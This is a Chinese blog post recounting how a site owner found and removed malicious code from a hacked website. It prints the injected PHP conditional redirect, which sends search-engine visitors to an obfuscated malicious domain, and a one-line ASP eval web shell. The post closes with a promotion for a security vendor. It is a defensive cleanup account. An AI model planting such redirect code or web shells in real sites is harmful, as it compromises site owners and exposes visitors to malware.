放假期间网站被挂马的解决办法

简介: 青岛峰会期间本来想给自己放几天假的,因为网站的挂马给泡汤了,打开网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多木马代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码,下面我把代码贴出来 :

青岛峰会期间本来想给自己放几天假的,因为网站的挂马给泡汤了,打开网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多木马代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码,下面我把代码贴出来 :

<?phperror_reporting(0);if(eregi('google|soso|sogou|baidu',$_SERVER['HTTP_REFERER']) ){ echo '<>window.location.href="http://www."+"tao"+"8s"+".in"+"fo";</>';}

恶意的挂马网址 www.tao8s.info

解释一下:这个代码是 PHP的代码是一种条件性的挂马,上面的google soso sogou baidu 都是挂马的条件,意思就是当从 google soso...等等搜索引擎来的访问客户会自动在网页上隐藏一行代码也就是挂马代码。

访问这个网站的用户,一般都会被360和百度提示网站有风险和网站挂马提示的,但是这个挂马为什么不提示呢? 这里我给大家解密下,不要以为病毒都会被杀毒软件杀掉,杀毒软件也不是万能的,就像警察抓小偷,警察不知道小偷的特征怎么去抓捕呢? 杀毒和这个道理一样的是根据特征来的,有一些病毒出来的早,没有被杀毒跟踪到,所以360和百度也不会有什么安全挂马提示(一般业界人士称“免杀病毒”。

说的有点多,言归正传。说点干货,那遇到这种情况咋办啊,我的解决办法就是先查清楚病因后除根,于是用FTP把网站程序全部打包下来然后一个一个文件的检查,看看有没有其他名字的文件,我在网上查到一般木马文件名字都是global.asa global.asp 啥的,反正是些不熟悉的文件名,检查了一下没有发现特殊的文件名字,于是开始检查代码方面,都知道程序员写代码能累死,于是在百度上查到了一个叫sinesafe的网站挂马代码检查工具,这个工具是专门检查挂马代码的和木马代码的。我把网站程序的代码文件放到工具检测了一下,发现了木马代码 <%eval request("hack")%> eval的特征代码,找到这个代码后我就给删除了,重复的用挂马检测工具检查了好几遍,没有发现问题后,我这才放心。连接到FTP,把网站程序重新上传了一遍,网站这才稳定下来。

折腾了我一天,连午睡都没捞着睡,困死我了。以上就是我网站被挂马后的解决经历,有什么不懂的也随时欢迎大家与我交流探讨。

专注于安全领域 解决网站安全 解决网站被黑 网站被挂马 网站被篡改 网站安全、服务器安全提供商-www.sinesafe.com --专门解决其他人解决不了的网站安全问题.
相关文章
|
7月前
|
弹性计算 安全 机器人
定时提醒再也不用担心忘记啦
好记性不如烂笔头,烂笔头不如靠谱的自动化~~~正在寻找自动化流程编排工具或定时任务工具的朋友们赶紧看过来,为你介绍一款简单配置即可实现自动化定时提醒的平台阿里云计算巢AppFLow。
|
运维 安全 固态存储
不需要的binlog如何手动干掉?放心,这不是删库更不用跑路。
不需要的binlog如何手动干掉?放心,这不是删库更不用跑路。
236 0
|
安全 Windows
Win系统 - 更新后,竟有这么“严重”的后果?
Win系统 - 更新后,竟有这么“严重”的后果?
179 0
Win系统 - 更新后,竟有这么“严重”的后果?
|
Windows
Win系统 - 更新卡太久,我能不能强制关机?(上)
Win系统 - 更新卡太久,我能不能强制关机?(上)
313 0
Win系统 - 更新卡太久,我能不能强制关机?(上)
Win系统 - 更新卡太久,我能不能强制关机?(下)
Win系统 - 更新卡太久,我能不能强制关机?(下)
130 0
Win系统 - 更新卡太久,我能不能强制关机?(下)
|
安全 算法 数据安全/隐私保护
关于网站被挂马的症状以及处理解决方法
如今绝大多数站长都在想着怎么建设外链,怎么发布网站内容,把自己网站的弄到首页或是前三位,网站安全其实也需要站长们注意,因为一旦网站安全出了问题,网站的排名也会受到很大的影响。下面就仔细分析几种关于网站安全的现象以及处理的方法。
510 0
关于网站被挂马的症状以及处理解决方法
|
程序员 Linux 数据库
这就是让程序猿删库跑路的命令,使用须谨慎
删库跑路这种说法其实也是程序员枯燥生活一种自我解压的方式,真要这么玩基本上这个程序员在软件行业也就不用混了
2093 0
|
安全 数据安全/隐私保护
卡巴斯基:五一期间谨防“NS下载器”木马程序
“五一劳动节”即将到来,从而也为平日紧张工作的人们提供了一个放松神经的“缓冲期”,但这对恶意程序制造者来说,却是其“吸金”的“好”机会。据国际知名信息安全厂商卡巴斯基的病毒监测报告显示,一个名为“NS下载器”木马程序近期处于高危爆发阶段,其可通过可移动存储设备对用户的计算机进行感染,对用户的个人信息安全将在一定程度上带来严重威胁。
1079 0
|
Web App开发 安全
南方网、潘玮柏中文网被挂马 目前尚未恢复安全
据瑞星“云安全”系统监测,5月11日这天,“地球城-北京信息港”、“华夏军魂网”、“广东新闻联播•南方网”等网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Trojan.Win32.AvKiller.is(AV终结者),导致用户电脑中的杀毒软件被关闭,从而下载大量木马病毒。
1136 0
|
安全
警惕“搜房网”“凯业房园”等网站被挂马
据瑞星“云安全”系统统计, 上周末期间,共有5,556,431人次的网民遭到网页挂马攻击,瑞星共截获了748,911个挂马网址。 周末最流行木马病毒是 Worm.Win32.Autorun.gbn(U盘蠕虫下载器)“云安全”系统共收到100,754次用户上报。
1815 0